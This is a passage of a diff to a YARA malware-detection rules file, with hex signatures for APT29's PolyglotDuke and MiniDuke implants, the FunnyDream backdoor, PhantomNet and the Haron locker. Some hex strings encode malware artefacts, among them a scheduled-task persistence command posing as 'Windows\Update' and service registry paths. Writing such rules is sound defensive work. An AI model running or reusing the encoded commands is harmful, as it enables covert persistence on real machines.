ff e8 f3 e5 f3 ff 8b f0 c6 45 fc 1b 83 bd ec fc ff ff 10 72 0e ff b5 d8 fc ff ff e8 ce 08 17 00 83 c4 04 c7 85 ec fc ff ff 0f 00 00 00 c7 85 e8 fc ff ff 00 00 00 00 c6 85 d8 fc ff ff 00 52 ba 13 63 67 6d ba 64 19 d5 47 ba 08 52 da 36 01 ea 29 f2 90 5a 55 bd 53 0d b6 39 bd 54 64 02 7d bd 29 00 37 0f 09 d5 31 c5 90 5d 8d 45 c0 8b ce 50 e8 f4 f0 f4 ff c6 45 fc 40 52 29 c2 ba a5 19 33 0c 19 ea 31 e2 01 c2 ba 3c 66 39 43 29 ca 5a 52 ba f7 42 4e 7a 09 d2 19 c2 19 e2 01 e2 21 ca 01 ca 01 da 90 5a 8d 45 d8 8b ce 50 e8 c9 fa f4 ff c6 45 fc 41 57 01 df 09 d7 bf 16 71 1b 6c bf 80 30 fd 65 01 ff 19 f7 21 ef 5f 50 29 e8 b8 6d 44 90 22 01 e8 21 c8 b8 17 5e 05 78 09 f0 01 e8 58 83 7d d0 00 76 5b 83 7d d4 08 8b 45 c0 73 03 8d 45 c0 83 7d ec 08 8b 4d d8 73 03 8d 4d d8 83 ec 08 50 6a 03 51 8d 4f 40 e8 3c 87 ff ff 89 87 a0 04 00 00 52 31 e2 01 e2 ba b7 14 98 25 01 ca ba 2f 1e d7 1b 19 f2 29 d2 5a 57 bf 75 4c a1 10 bf dc 04 47 09 01 d7 bf 9e 5f 9a 0e 01 e7 90 5f eb 4e 83 7d ec 08 8b 45 d8 73 03 8d 45 d8 83 ec 08 8d 4f 40 6a 00 6a 01 50 e8 ec 86 ff ff 89 87 a0 04 00 00 53 bb ea 4a 79 17 21 eb 31 db bb b9 2c e1 4c 09 d3 21 eb 19 c3 5b 51 b9 91 6c 71 6d b9 64 25 d3 02 19 c1 19 c1 31 e1 29 f1 29 d9 59 83 bf a0 04 00 00 00 0f 85 a6 00 00 00 8d 8d e4 fe ff ff c7 85 e4 fe ff ff 43 61 6e 6e 51 8d 85 00 ff ff ff c7 85 e8 fe ff ff 6f 74 20 70 50 51 8d 8d 68 fb ff ff c7 85 ec fe ff ff 65 72 66 6f c7 85 f0 fe ff ff 72 6d 20 49 c7 85 f4 fe ff ff 6e 74 65 72 c7 85 f8 fe ff ff 6e 65 74 4f c7 85 fc fe ff ff 70 65 6e 21 e8 bd 74 f2 ff c6 45 fc 42 83 78 14 10 } - $seq2 = { 59 52 29 d2 ba 02 4d d2 52 ba 5f 54 50 4f 29 ea 29 c2 01 ea 01 e2 5a 56 21 ee 01 ee be 38 36 21 60 31 f6 19 ce 29 d6 be 13 6c 2d 6f 5e 85 c0 0f 85 0a 02 00 00 8d 8d 1c fe ff ff c7 85 1c fe ff ff 43 61 6e 6e 51 8d 85 5e fe ff ff c7 85 20 fe ff ff 6f 74 20 69 50 51 8d 8d c4 f7 ff ff c7 85 24 fe ff ff 6e 69 74 69 c7 85 28 fe ff ff 61 6c 69 7a c7 85 2c fe ff ff 65 20 73 69 c7 85 30 fe ff ff 67 6e 65 72 c7 85 34 fe ff ff 21 20 43 61 c7 85 38 fe ff ff 6e 6e 6f 74 c7 85 3c fe ff ff 20 70 65 72 c7 85 40 fe ff ff 66 6f 72 6d c7 85 44 fe ff ff 20 43 72 79 c7 85 48 fe ff ff 70 74 41 63 c7 85 4c fe ff ff 71 75 69 72 c7 85 50 fe ff ff 65 43 6f 6e c7 85 54 fe ff ff 74 65 78 74 c7 85 58 fe ff ff 20 65 72 72 66 c7 85 5c fe ff ff 6f 72 e8 93 5b f1 ff c6 45 fc 46 83 78 14 10 72 02 8b 00 50 8d 8d f0 f9 ff ff e8 db 5a f1 ff c6 45 fc 47 ff d3 50 8d 85 f0 f9 ff ff 50 8d 8d 78 f8 ff ff e8 c2 e3 f8 ff 68 d4 4f 2e 10 8d 85 78 f8 ff ff 50 e8 3c 31 16 00 8d 8d 64 fe ff ff c7 85 64 fe ff ff 43 61 6e 6e 51 8d 85 a6 fe ff ff c7 85 68 fe ff ff 6f 74 20 69 50 51 8d 8d 94 f7 ff ff c7 85 6c fe ff ff 6e 69 74 69 c7 85 70 fe ff ff 61 6c 69 7a c7 85 74 fe ff ff 65 20 73 69 c7 85 78 fe ff ff 67 6e 65 72 c7 85 7c fe ff ff 21 20 43 61 c7 85 80 fe ff ff 6e 6e 6f 74 c7 85 84 fe ff ff 20 70 65 72 c7 85 88 fe ff ff 66 6f 72 6d c7 85 8c fe ff ff 20 43 72 79 c7 85 90 fe ff ff 70 74 41 63 c7 85 94 fe ff ff 71 75 69 72 c7 85 98 fe ff ff 65 43 6f 6e c7 85 9c fe ff ff 74 65 78 74 c7 85 a0 fe ff ff 20 65 72 72 66 c7 85 a4 fe ff ff 6f 72 e8 8e 5a f1 ff c6 45 fc 48 83 78 14 10 72 02 8b 00 } - $seq3 = { c7 85 1c f8 ff ff 07 00 00 00 c7 85 18 f8 ff ff 00 00 00 00 33 c0 66 89 85 08 f8 ff ff 53 19 f3 21 db 21 fb 31 f3 29 fb 19 f3 bb 9f 7a e7 00 21 fb 90 5b 52 ba 77 2c 66 51 ba 60 54 5a 36 19 ea 09 ca ba 32 36 94 1b 90 5a 53 09 eb bb 92 73 c4 2a bb d1 71 ed 5e 01 eb bb 9b 43 21 23 90 5b 50 b8 09 65 36 3a 09 c0 29 e8 29 f8 21 f8 b8 3d 39 c6 44 01 e8 58 89 85 78 fd ff ff 89 85 7c fd ff ff 89 85 80 fd ff ff 89 85 84 fd ff ff 89 85 88 fd ff ff 89 85 8c fd ff ff c7 85 88 f8 ff ff 52 65 67 4f c7 85 8c f8 ff ff 70 65 6e 4b c7 85 90 f8 ff ff 65 79 45 78 c6 85 94 f8 ff ff 57 89 85 48 f8 ff ff 89 85 4c f8 ff ff c7 85 4c f8 ff ff 0f 00 00 00 89 85 48 f8 ff ff 88 85 38 f8 ff ff 8d 85 95 f8 ff ff 50 8d 85 88 f8 ff ff 50 8d 85 38 f8 ff ff 50 50 8b c8 e8 99 c1 de ff c6 45 fc 0a 83 bd 4c f8 ff ff 10 8b 85 38 f8 ff ff 73 06 8d 85 38 f8 ff ff 50 8d } - $seq4 = { 31 e1 b9 e9 52 83 05 29 d1 01 f9 59 80 7d 0c 00 0f 84 fb 03 00 00 66 c7 85 70 fe ff ff 0d 0a c7 85 50 fe ff ff 0d 0a 2d 2d c7 85 14 fe ff ff 53 75 62 6d c7 85 18 fe ff ff 69 74 74 65 c6 85 1c fe ff ff 64 c7 85 78 fd ff ff 43 6f 6e 74 c7 85 7c fd ff ff 65 6e 74 2d c7 85 80 fd ff ff 44 69 73 70 c7 85 84 fd ff ff 6f 73 69 74 c7 85 88 fd ff ff 69 6f 6e 3a c7 85 8c fd ff ff 20 66 6f 72 c7 85 90 fd ff ff 6d 2d 64 61 c7 85 94 fd ff ff 74 61 3b 20 c7 85 98 fd ff ff 6e 61 6d 65 c7 85 9c fd ff ff 3d 22 65 6e c7 85 a0 fd ff ff 64 22 0d 0a 66 c7 85 a4 fd ff ff 0d 0a 8d 8d 70 fe ff ff 8d 85 72 fe ff ff 51 50 51 8d 8d 3c fa ff ff e8 b3 34 fb ff 8b d8 c6 45 fc 35 8d 8d 50 fe ff ff 8d 85 54 fe ff ff 51 50 51 8d 8d 6c fa ff ff e8 93 34 fb ff 8b f8 c6 45 fc 36 8d 8d 14 fe ff ff 8d 85 1d fe ff ff 51 50 51 8d 8d 84 fa ff ff e8 73 34 fb ff c6 45 fc 37 83 78 14 10 72 02 8b 00 50 8d 8d 1c f8 ff ff e8 bb 33 fb ff 89 85 7c fe ff ff c6 45 fc 38 8d 8d 78 fd ff ff 8d 85 a6 fd ff ff 51 50 51 8d 8d 80 f8 ff ff e8 37 34 fb ff c6 45 fc 39 83 78 14 10 72 02 8b 00 ff b5 7c fe ff ff 8b d0 8d 8d 04 f7 ff ff e8 88 4e fc ff 83 c4 04 c6 45 fc 3a 83 7f 14 10 72 02 8b 3f 57 8b d0 8d 8d 9c f8 ff ff e8 cb 60 fb ff c6 45 fc 3b 8d 4d d4 51 8b d0 8d 8d 74 f7 ff ff e8 96 b9 00 00 83 c4 08 c6 45 fc 3c 83 7b 14 10 72 02 8b 1b 53 8b d0 8d 8d b8 f8 ff ff e8 99 60 fb ff 83 c4 04 c6 45 fc 3d 6a ff 6a 00 50 8d 4d a4 e8 d5 39 fb ff c6 45 fc 3c 83 bd cc f8 ff ff 10 72 0e ff b5 b8 f8 ff ff e8 d2 c5 1f 00 83 c4 04 c7 85 cc f8 ff ff 0f 00 00 00 c7 85 c8 f8 ff ff 00 00 00 00 c6 85 b8 f8 ff ff 00 c6 45 fc 3b 83 bd 88 f7 ff ff 10 72 0e ff b5 74 f7 ff ff e8 9c c5 1f 00 83 c4 04 c7 85 88 f7 ff ff 0f 00 00 00 c7 85 84 f7 ff ff 00 00 00 00 c6 85 74 f7 ff ff 00 c6 45 fc 3a 83 bd b0 f8 ff ff 10 72 0e ff b5 9c f8 ff ff e8 66 c5 1f 00 83 c4 04 c7 85 b0 f8 ff ff 0f 00 00 00 c7 85 ac f8 ff ff 00 00 00 00 c6 85 9c f8 ff ff 00 c6 45 fc 39 83 bd 18 f7 ff ff 10 72 0e ff b5 04 f7 ff ff e8 30 c5 1f 00 83 c4 04 c7 85 18 f7 ff ff 0f 00 00 00 c7 85 14 f7 ff ff 00 00 00 00 c6 85 04 f7 ff ff 00 c6 45 fc 38 83 bd 94 f8 ff ff 10 72 0e ff b5 80 f8 ff ff e8 fa c4 1f 00 83 c4 04 c7 85 94 f8 ff ff 0f 00 00 00 c7 85 90 f8 ff ff 00 00 00 00 c6 85 80 f8 ff ff 00 c6 45 fc 37 83 bd 30 f8 ff ff 10 72 0e ff b5 1c f8 ff ff e8 c4 c4 1f 00 83 c4 04 c7 85 30 f8 ff ff 0f 00 00 00 c7 85 2c f8 ff ff 00 00 00 00 c6 85 1c f8 ff ff 00 c6 45 fc 36 83 bd 98 fa ff ff 10 72 0e ff b5 84 fa ff ff e8 8e c4 1f 00 83 c4 04 c7 85 98 fa ff ff 0f 00 00 00 c7 85 94 fa ff ff 00 00 00 00 c6 85 84 fa ff ff 00 c6 45 fc 35 83 bd 80 fa ff ff 10 72 0e ff b5 6c fa ff ff e8 58 c4 1f 00 83 c4 04 c7 85 80 fa ff ff 0f 00 00 00 c7 85 7c fa ff ff 00 00 00 00 c6 85 6c fa ff ff 00 c6 45 fc 27 83 bd 50 fa ff ff 10 72 0e ff b5 3c fa ff ff e8 22 c4 1f 00 83 c4 04 c7 85 50 fa ff ff 0f 00 00 00 c7 85 4c fa ff ff 00 00 00 00 c6 85 3c fa ff ff 00 53 19 d3 bb 18 4a 91 1c 21 c3 bb 82 54 5d 2c bb b0 08 2a 58 90 5b 51 21 e9 b9 b9 6e b4 14 31 f1 01 c1 01 f9 19 e1 21 d9 09 f9 90 59 56 be cd 3a 33 5a be 85 1b aa 6f be 1e 6c 78 2d 19 d6 21 e6 90 5e 53 31 f3 bb 8c 21 88 0d 31 db 31 eb 19 d3 19 f3 31 f3 01 f3 90 5b 80 7e 40 00 0f 85 03 06 00 00 66 c7 85 60 fe ff ff 0d 0a c7 85 48 fe ff ff 0d 0a 2d 2d c7 85 d8 fc ff ff 43 6f 6e 74 c7 85 dc fc ff ff 65 6e 74 2d c7 85 e0 fc ff ff 44 69 73 70 c7 85 e4 fc ff ff 6f 73 69 74 c7 85 e8 fc ff ff 69 6f 6e 3a c7 85 ec fc ff ff 20 66 6f 72 c7 85 f0 fc ff ff 6d 2d 64 61 c7 85 f4 fc ff ff 74 61 3b 20 c7 85 f8 fc ff ff 6e 61 6d 65 c7 85 fc fc ff ff 3d 22 63 73 c7 85 00 fd ff ff 72 66 5f 74 c7 85 04 fd ff ff 6f 6b 65 6e c7 85 08 fd ff ff 22 0d 0a 0d c6 85 0c fd ff ff 0a 8d 8d 60 fe ff ff 8d 85 62 fe ff ff 51 50 51 8d 8d 00 f9 ff ff e8 b7 30 fb ff 8b d8 c6 45 fc 3e 8d 8d 48 fe ff ff 8d 85 4c fe ff ff 51 50 51 8d 8d 30 f9 ff ff e8 97 30 } - $op1 = { 37 25 38 3d 38 43 38 5e 38 6c 38 77 38 } - $op2 = { 3f 25 3f 36 3f 66 3f 74 3f } - $op3 = { 68 66 43 78 28 6a 25 } - $op4 = { 61 46 25 7c 5f 56 21 } - - condition: - uint16(0)==0x5a4d and filesize >350KB and 2 of ($seq*) and 3 of ($op*) -} -rule ARKBIRD_SOLG_APT_APT29_Polyglotduke_Mar_2021_1 : FILE -{ - meta: - description = "Detect PolyglotDuke implant used by APT29 group" - author = "Arkbird_SOLG" - id = "751e4f57-2c31-5cad-a794-e124b40c537b" - date = "2021-03-08" - modified = "2021-03-10" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_PolyglotDuke_Mar_2021_1.yar#L1-L19" - license_url = "N/A" - logic_hash = "3a6d54fb266fe054886569c200f122b1e4459e0d561fe5246b623a19ec526224" - score = 75 - quality = 75 - tags = "FILE" - hash1 = "9b33ec7f5e615a6556f147b611425d3ca4a8879ce746d4a8cb62adf4c7f76029" - hash2 = "0c39fce5bd32b4f91a1df4f6321c2f01c017195659c7e95a235ef71ca2865aa9" - - strings: - $seq1 = { 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 02 ff d0 48 83 c4 28 c3 cc 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 02 ff d0 48 83 c4 28 c3 cc 4c 8b 15 [2] 02 00 41 8b c0 4c 33 15 [2] 02 00 74 03 49 ff e2 83 e0 01 4c 8b ca 41 83 e0 02 8b d0 48 ff 25 [2] 01 00 cc cc cc 4c 8b 15 [2] 02 00 4c 33 15 [2] 02 00 74 03 49 ff e2 48 ff 25 [2] 01 00 cc cc 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 07 48 83 c4 28 48 ff e0 b9 78 00 00 00 ff 15 [2] 01 00 32 c0 48 83 c4 28 c3 cc cc cc 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 03 48 ff e0 33 c0 c3 cc cc 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 03 48 ff e0 } - $seq2 = { 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 57 48 83 ec 30 33 ff 48 8b da 48 8b f1 48 85 c9 75 18 e8 69 0c 00 00 bb 16 00 00 00 89 18 e8 b1 38 00 00 8b c3 e9 a7 00 00 00 48 85 d2 74 e3 e8 a8 3f 00 00 41 bf 01 00 00 00 85 c0 75 0c ff 15 [2] 01 00 85 c0 41 0f 44 ff 83 64 24 28 00 48 83 23 00 48 83 64 24 20 00 41 83 c9 ff 4c 8b c6 33 d2 8b cf ff 15 [2] 01 00 48 63 e8 85 c0 75 11 ff 15 [2] 01 00 8b c8 e8 b2 0b 00 00 33 c0 eb 4f 48 8b cd 48 03 c9 e8 e3 07 00 00 48 89 03 48 85 c0 74 e9 41 83 c9 ff 4c 8b c6 33 d2 8b cf 89 6c 24 28 48 89 44 24 20 ff 15 [2] 01 00 85 c0 75 1b ff 15 [2] 01 00 8b c8 e8 70 0b 00 00 48 8b 0b e8 ?? f3 ff ff 48 83 23 00 eb b0 41 8b c7 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 8b 7c 24 58 48 83 c4 30 41 5f c3 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 57 48 83 ec 40 33 ff 48 8b da 48 8b f1 } - $seq3 = { ff 25 00 00 00 00 00 00 00 00 00 00 00 00 cc } - $seq4 = "InitSvc" fullword ascii + hash1 = "97a5fe1d2174e9d34cee8c1d6751bf01f99d8f40b1ae0bce205b8f2f0483225c" + + strings: + $s1 = { 63 6d 64 20 2f 63 20 73 63 68 74 61 73 6b 73 20 2f 46 20 2f 63 72 65 61 74 65 20 2f 74 6e 3a 57 69 6e 64 6f 77 73 5c 55 70 64 61 74 65 20 2f 74 72 20 22 25 73 22 20 20 20 2f 73 63 20 48 4f 55 52 4c 59 } + $s2 = { 25 73 5c 73 79 73 74 65 6d 33 32 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 25 73 } + $s3 = { 25 73 79 73 74 65 6d 72 6f 6f 74 25 } + $s4 = { 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c [1-8] 5c [1-8] 2e 63 61 62 } + $s5 = { 53 6d 61 6e 61 67 65 72 5f 73 73 6c 2e 64 6c 6c } + $s6 = { 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 20 4e 54 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 53 76 63 68 6f 73 74 } + $s7 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 53 65 72 76 69 63 65 73 5c } + $s8 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 61 70 70 70 61 74 63 68 5c } + $s9 = "TmV0QmlvcyBNZXNzYWdlciBSZWdpc3Rlcg==" fullword ascii + $s10 = { 68 74 74 70 73 3d 25 5b 5e 3a 5d 3a 25 64 00 00 68 74 74 70 73 3d 00 00 73 6f 63 6b 73 3d 25 5b 5e 3a 5d 3a 25 64 00 00 73 6f 63 6b 73 3d 00 00 68 74 74 70 3d 25 5b 5e 3a 5d 3a 25 64 00 00 00 68 74 74 70 3d } + $s11 = "&About VVSup..." fullword wide + $s12 = "%d.tmp" fullword ascii condition: - uint16(0)==0x5a4d and filesize >100KB and 3 of them + uint16(0)==0x5a4d and filesize >90KB and 7 of them } -rule ARKBIRD_SOLG_APT_APT29_Miniduke_Mar_2021_1 : FILE +rule ARKBIRD_SOLG_Mal_Funnydream_Backdoor_Nov_2020_1 : FILE { meta: - description = "Detect MiniDuke implant used by APT29 group" + description = "Detect backdoor used by FunnyDream (November 2020)" author = "Arkbird_SOLG" - id = "2faefc2f-afe3-51df-b530-50d3b3775071" - date = "2021-03-08" - modified = "2021-03-10" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_MiniDuke_Mar_2021_1.yar#L1-L20" + id = "48120ba2-adaa-5098-8d8c-5c32bbafb9f6" + date = "2020-12-19" + modified = "2020-12-19" + reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_FunnyDream_Backdoor_Nov_2020_1.yar#L1-L22" license_url = "N/A" - logic_hash = "2fcbe37f9ee26a246bfc397cc907bb570a01d0f5b8e323a81aae0f6426b60435" - score = 50 - quality = 75 + logic_hash = "d12c465c735f09295b382fd5679d411c5114c232dabc22be84151e436f8fa199" + score = 75 + quality = 67 tags = "FILE" - hash1 = "6057b19975818ff4487ee62d5341834c53ab80a507949a52422ab37c7c46b7a1" - level = "Experimental" + hash1 = "ce5c8741bffa8de5093d1831d736a7e478a54baa3676da37cde24f38d10f3529" strings: - $s1 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 6e 64 61 72 79 3d 00 00 00 00 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 25 73 } - $s2 = { 70 72 6f 63 3a 20 20 25 64 20 25 73 0a 6c 6f 67 69 6e 3a 20 25 73 5c 25 73 0a 49 44 3a 20 20 20 20 30 78 25 30 38 58 0a 68 6f 73 74 3a 20 20 25 73 3a 25 64 0a 6d 65 74 68 3a 20 20 25 73 20 25 64 0a 70 69 70 65 3a 20 5c 5c 25 73 5c 70 69 70 65 5c 25 73 0a 6c 61 6e 67 3a 20 20 25 73 0a 64 65 6c 61 79 3a 20 25 64 } - $s3 = { 75 70 74 69 6d 65 20 25 35 64 2e 25 30 32 64 68 0a 00 25 73 3a 25 64 00 25 73 5c 25 73 00 3f 00 25 64 20 25 73 0a 25 73 20 25 73 20 25 73 } - $s4 = { 55 89 e5 83 ec 14 6a 02 ff 15 b8 53 44 00 e8 fd fe ff ff 8d b6 00 00 00 00 8d bc 27 00 00 00 00 55 89 e5 83 ec 14 6a 01 ff 15 } - $s5 = { 8b 85 54 64 ff ff 8b 95 44 64 ff ff 83 c2 44 89 44 24 04 89 14 24 e8 a4 e5 fc ff 83 ec 08 8b 85 44 64 ff ff 83 c0 38 c7 44 24 08 0c 00 00 00 c7 44 24 04 00 00 00 00 89 04 24 e8 8c e8 fd ff 8b 85 44 64 ff ff c7 40 38 0c 00 00 00 8b 85 44 64 ff ff c7 40 40 01 00 00 00 8b 85 44 64 ff ff c7 40 3c 00 00 00 00 8b 85 44 64 ff ff 8d 58 38 8b 85 44 64 ff ff 8d 50 1c 8b 85 44 64 ff ff 83 c0 18 c7 44 24 0c 00 40 00 00 89 5c 24 08 89 54 24 04 89 04 24 e8 2e e5 fc ff 83 ec 10 85 c0 0f 95 c0 84 c0 0f 84 09 05 00 00 8b 85 44 64 ff ff 8d 58 38 8b 85 44 64 ff ff 8d 50 24 8b 85 44 64 ff ff 83 c0 20 c7 44 24 0c 00 40 00 00 89 5c 24 08 89 54 24 04 89 04 24 e8 eb e4 fc ff 83 ec 10 85 c0 0f 95 c0 84 c0 } + $s1 = { 25 64 25 64 25 64 20 25 64 3a 25 64 } + $s2 = { 73 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 49 6e 74 65 72 6e 65 74 20 53 65 74 74 69 6e 67 73 00 00 50 72 6f 78 79 45 6e 61 62 6c 65 00 50 72 6f 78 79 53 65 72 76 65 } + $s3 = { 48 41 52 44 57 41 52 45 5c 44 45 53 43 52 49 50 54 49 4f 4e 5c 53 79 73 74 65 6d 5c 43 65 6e 74 72 61 6c 50 72 6f 63 65 73 73 6f 72 5c 30 } + $s4 = { 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 75 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 25 75 25 73 25 73 0d 0a 53 65 72 76 65 72 3a 20 53 69 6d 70 6c 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 } + $s5 = { 43 4f 4e 4e 45 43 54 20 25 73 3a 25 64 20 48 54 54 50 2f 31 2e 30 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 31 30 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 3b 29 0d 0a 50 72 6f 78 79 2d 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 25 73 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 0d 0a } + $s6 = { 31 32 33 34 35 36 00 00 55 73 65 72 2d 30 30 31 } + $s7 = { 25 73 20 25 73 25 73 2f 25 73 2f 25 30 38 58 25 30 38 58 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 30 38 58 25 30 38 78 } + $s8 = { 63 6c 74 2e 65 78 65 00 44 6c 6c 49 6e 73 74 61 6c 6c 00 53 74 61 72 74 } + $s9 = { 32 30 30 20 43 6f 6e 6e 65 63 74 69 6f 6e 20 65 73 74 61 62 6c 69 73 68 65 64 } + $s10 = { 5c 63 6d 64 c7 85 e0 fe ff ff 2e 65 78 65 } condition: - uint16(0)==0x5a4d and filesize >150KB and 3 of them + uint16(0)==0x5a4d and filesize >90KB and 6 of them } -rule ARKBIRD_SOLG_RAN_Haron_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_Mal_Phantomnet_Nov_2020_1 : FILE { meta: - description = "Detect Haron locker" + description = "Detect PhantomNet (November 2020)" author = "Arkbird_SOLG" - id = "5900ad0e-66ca-5127-b8c2-cc23ace8929f" - date = "2021-08-09" - modified = "2021-08-09" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-09/RAN_Haron_Aug_2021_1.yara#L1-L22" + id = "16ddcc9a-8254-5d40-adcd-70ebe212fc78" + date = "2020-12-19" + modified = "2020-12-19" + reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_PhantomNet_Nov_2020_1.yar#L1-L24" license_url = "N/A" - logic_hash = "5001041d9bb8acc0fa5e0e3b4cfacc5a891bed6885101ae3513b5524c91c572d" + logic_hash = "a08467f68968fb0dfa82bca5984e1ad823f222946bd0acb62db418556a9a347a" score = 75 - quality = 75 + quality = 65 tags = "FILE" - hash1 = "66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2" - hash2 = "6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c" - tlp = "white" - adversary = "Haron" + hash1 = "ea7b2def3335b81048aac8fc372349f38453b676fa833603b7e15c45437f6858" + hash2 = "338502691f6861ae54e651a25a08e62eeca9febc6830978a670d44caf3d5d056" strings: - $s1 = { 02 17 8d ?? 00 00 01 [2] 16 20 [2] 00 00 20 00 ?? 00 00 [1-5] 73 [2] 01 00 0a a2 ?? 7d ?? 01 00 0a } - $s2 = { 03 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 } - $s3 = { 1f 38 16 02 28 ?? 01 00 0a 16 9a 6f ?? 01 00 0a b8 28 ?? 00 00 06 13 07 7e ?? 01 00 0a 13 0b 11 07 11 0b 11 06 6e 1f 60 6a d7 88 20 00 30 00 00 1f 40 28 ?? 00 00 06 28 ?? 01 00 0a b8 13 08 11 07 02 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 28 ?? 01 00 0a b8 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 84 b8 13 09 11 07 02 7e } - $s4 = { 1f 18 02 28 ?? 01 00 0a 16 9a 6f ?? 01 00 0a b8 28 ?? 00 00 06 0a 7e ?? 01 00 0a 0b 06 07 28 ?? 01 00 0a 0c 08 2c 04 07 0d 2b 6f 12 04 fe 15 ?? 00 00 02 12 04 11 04 28 ?? 00 00 2b b8 7d ?? 00 00 04 06 12 04 28 ?? 00 00 06 0c 08 2c 4a 12 04 7c ?? 00 00 04 28 ?? 01 00 0a 20 ff ff ff 7f 6a fe 02 16 fe 01 13 05 11 05 2c 17 03 12 04 7b ?? 00 00 04 17 28 ?? 01 00 0a 16 fe 01 13 06 11 06 2d 0c 06 12 04 28 ?? 00 00 06 2d c2 2b 0a 12 04 7b ?? 00 00 04 0d 09 2a 07 0d 09 2a } - $s5 = { 28 0e 00 00 0a 0b 16 0c 38 84 01 00 00 07 08 9a 0a 06 6f ?? 01 00 0a 20 00 00 80 0c 6a 3e 66 01 00 00 06 6f 0d 00 00 0a 28 0c 00 00 0a 6f 0d 00 00 0a 28 21 00 00 0a 39 4c 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 2d 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 0e 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a ef 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a d0 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a b1 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 92 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 76 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 5a 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 3e 06 